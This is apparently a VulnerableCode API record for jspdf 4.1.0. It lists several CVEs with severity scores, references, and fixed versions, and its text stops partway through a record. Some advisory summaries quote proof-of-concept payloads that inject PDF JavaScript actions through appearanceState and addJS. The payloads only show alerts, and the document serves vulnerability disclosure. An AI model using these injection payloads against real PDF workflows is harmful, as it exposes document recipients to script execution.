Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/73762?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/73762?format=api", "purl": "pkg:npm/jspdf@4.1.0", "type": "npm", "namespace": "", "name": "jspdf", "version": "4.1.0", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "4.2.1", "latest_non_vulnerable_version": "4.2.1", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50247?format=api", "vulnerability_id": "VCID-5hnn-r83k-u3ba", "summary": "jsPDF has a PDF Injection in AcroForm module allows Arbitrary JavaScript Execution (RadioButton.createOption and \"AS\" property)\nUser control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions.\n\nIf given the possibility to pass unsanitized input to the following property, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim hovers over the radio option.\n\n* `AcroformChildClass.appearanceState`\n\nExample attack vector:\n\n```js\nimport { jsPDF } from \"jspdf\"\nconst doc = new jsPDF();\n\nconst group = new doc.AcroFormRadioButton();\ngroup.x = 10; group.y = 10; group.width = 20; group.height = 10;\ndoc.addField(group);\n\nconst child = group.createOption(\"opt1\");\nchild.x = 10; child.y = 10; child.width = 20; child.height = 10;\nchild.appearanceState = \"Off /AA << /E << /S /JavaScript /JS (app.alert('XSS')) >> >>\";\n\ndoc.save(\"test.pdf\");\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25940.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25940.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25940", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13055", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13156", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.1316", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13118", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13023", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25940" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/71ad2dbfa6c7c189ab42b855b782620fa8a38375", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:05Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/71ad2dbfa6c7c189ab42b855b782620fa8a38375" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:05Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441016", "reference_id": "2441016", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441016" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25940", "reference_id": "CVE-2026-25940", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25940" }, { "reference_url": "https://github.com/advisories/GHSA-p5xg-68wr-hm3m", "reference_id": "GHSA-p5xg-68wr-hm3m", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p5xg-68wr-hm3m" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-p5xg-68wr-hm3m", "reference_id": "GHSA-p5xg-68wr-hm3m", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:05Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-p5xg-68wr-hm3m" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7110", "reference_id": "RHSA-2026:7110", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7110" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7128", "reference_id": "RHSA-2026:7128", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7128" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/74149?format=api", "purl": "pkg:npm/jspdf@4.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-h1m4-jwms-tqee" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.2.0" } ], "aliases": [ "CVE-2026-25940", "GHSA-p5xg-68wr-hm3m" ], "risk_score": 4.3, "exploitability": "0.5", "weighted_severity": "8.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5hnn-r83k-u3ba" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/64816?format=api", "vulnerability_id": "VCID-6pvn-kfpj-e3g7", "summary": "jspdf: jsPDF: Arbitrary code execution via unsanitized input in createAnnotation method", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31898.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31898.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31898", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14608", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14703", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14709", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14667", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14584", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31898" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/blob/b1607a9391d4cd65ea7ade25998aea8345ae1be3/src/modules/annotations.js#L193-L208", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T14:00:36Z/" } ], "url": "https://github.com/parallax/jsPDF/blob/b1607a9391d4cd65ea7ade25998aea8345ae1be3/src/modules/annotations.js#L193-L208" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/4155c4819d5eca284168e51e0e1e81126b4f14b8", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T14:00:36Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/4155c4819d5eca284168e51e0e1e81126b4f14b8" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T14:00:36Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.1" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-7x6v-j9x4-qf24", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T14:00:36Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-7x6v-j9x4-qf24" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31898", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31898" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448547", "reference_id": "2448547", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448547" }, { "reference_url": "https://github.com/advisories/GHSA-7x6v-j9x4-qf24", "reference_id": "GHSA-7x6v-j9x4-qf24", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7x6v-j9x4-qf24" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7110", "reference_id": "RHSA-2026:7110", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7110" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7128", "reference_id": "RHSA-2026:7128", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7128" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112985?format=api", "purl": "pkg:npm/jspdf@4.2.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.2.1" } ], "aliases": [ "CVE-2026-31898", "GHSA-7x6v-j9x4-qf24" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6pvn-kfpj-e3g7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50253?format=api", "vulnerability_id": "VCID-fdf6-8j56-qqc6", "summary": "jsPDF Affected by Client-Side/Server-Side Denial of Service via Malicious GIF Dimensions\nUser control of the first argument of the `addImage` method results in denial of service.\n\nIf given the possibility to pass unsanitized image data or URLs to the `addImage` method, a user can provide a harmful GIF file that results in out of memory errors and denial of service. Harmful GIF files have large width and/or height entries in their headers, wich lead to excessive memory allocation.\n\nOther affected methods are: `html`.\n\nExample attack vector:\n\n```js\nimport { jsPDF } from \"jspdf\"\n\n// malicious GIF image data with large width/height headers\nconst payload = ...\n\nconst doc = new jsPDF();\n\ndoc.addImage(payload, \"GIF\", 0, 0, 100, 100);\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25535.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25535.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25535", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00084", "scoring_system": "epss", "scoring_elements": "0.24397", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00084", "scoring_system": "epss", "scoring_elements": "0.24514", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00084", "scoring_system": "epss", "scoring_elements": "0.24501", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00084", "scoring_system": "epss", "scoring_elements": "0.24444", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00084", "scoring_system": "epss", "scoring_elements": "0.24386", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25535" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/2e5e156e284d92c7d134bce97e6418756941d5e6", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-19T16:03:04Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/2e5e156e284d92c7d134bce97e6418756941d5e6" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-19T16:03:04Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440992", "reference_id": "2440992", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440992" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25535", "reference_id": "CVE-2026-25535", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25535" }, { "reference_url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25535.md", "reference_id": "CVE-2026-25535.MD", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-19T16:03:04Z/" } ], "url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25535.md" }, { "reference_url": "https://github.com/advisories/GHSA-67pg-wm7f-q7fj", "reference_id": "GHSA-67pg-wm7f-q7fj", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-67pg-wm7f-q7fj" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-67pg-wm7f-q7fj", "reference_id": "GHSA-67pg-wm7f-q7fj", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-19T16:03:04Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-67pg-wm7f-q7fj" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7110", "reference_id": "RHSA-2026:7110", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7110" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7128", "reference_id": "RHSA-2026:7128", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7128" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/74149?format=api", "purl": "pkg:npm/jspdf@4.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6pvn-kfpj-e3g7" }, { "vulnerability": "VCID-h1m4-jwms-tqee" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.2.0" } ], "aliases": [ "CVE-2026-25535", "GHSA-67pg-wm7f-q7fj" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fdf6-8j56-qqc6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/64815?format=api", "vulnerability_id": "VCID-h1m4-jwms-tqee", "summary": "jspdf: jsPDF: Cross site scripting via unsanitized output options", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31938.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31938.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31938", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16072", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16188", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16179", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16136", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16049", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31938" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/87a40bbd07e6b30575196370670b41f264aa78d7", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T13:59:39Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/87a40bbd07e6b30575196370670b41f264aa78d7" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T13:59:39Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.1" }, { "reference_url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-wfv2-pwc8-crg5", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-18T13:59:39Z/" } ], "url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-wfv2-pwc8-crg5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31938", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31938" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448550", "reference_id": "2448550", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448550" }, { "reference_url": "https://github.com/advisories/GHSA-wfv2-pwc8-crg5", "reference_id": "GHSA-wfv2-pwc8-crg5", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wfv2-pwc8-crg5" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7110", "reference_id": "RHSA-2026:7110", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7110" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7128", "reference_id": "RHSA-2026:7128", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7128" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112985?format=api", "purl": "pkg:npm/jspdf@4.2.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/jspdf@4.2.1" } ], "aliases": [ "CVE-2026-31938", "GHSA-wfv2-pwc8-crg5" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-h1m4-jwms-tqee" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50260?format=api", "vulnerability_id": "VCID-hu3v-vhnb-kuhw", "summary": "jsPDF has a PDF Object Injection via Unsanitized Input in addJS Method\nUser control of the argument of the `addJS` method allows an attacker to inject arbitrary PDF objects into the generated document. By crafting a payload that escapes the JavaScript string delimiter, an attacker can execute malicious actions or alter the document structure, impacting any user who opens the generated PDF.\n\n```js\nimport { jsPDF } from \"jspdf\";\nconst doc = new jsPDF();\n// Payload:\n// 1. ) closes the JS string.\n// 2. > closes the current dictionary.\n// 3. /AA ... injects an \"Additional Action\" that executes on focus/open.\nconst maliciousPayload = \"console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>\";\n\ndoc.addJS(maliciousPayload);\ndoc.save(\"vulnerable.pdf\");\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25755.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25755.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25755", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07631", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07676", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07689", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07663", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07619", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25755" }, { "reference_url": "https://github.com/parallax/jsPDF", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/parallax/jsPDF" }, { "reference_url": "https://github.com/parallax/jsPDF/commit/56b46d45b052346f5995b005a34af5dcdddd5437", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:08Z/" } ], "url": "https://github.com/parallax/jsPDF/commit/56b46d45b052346f5995b005a34af5dcdddd5437" }, { "reference_url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-19T17:07:08Z/" } ], "url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.0" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440993", "reference_id": "2440993", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440993" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25755", "reference_id": "CVE-2026-25755", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": 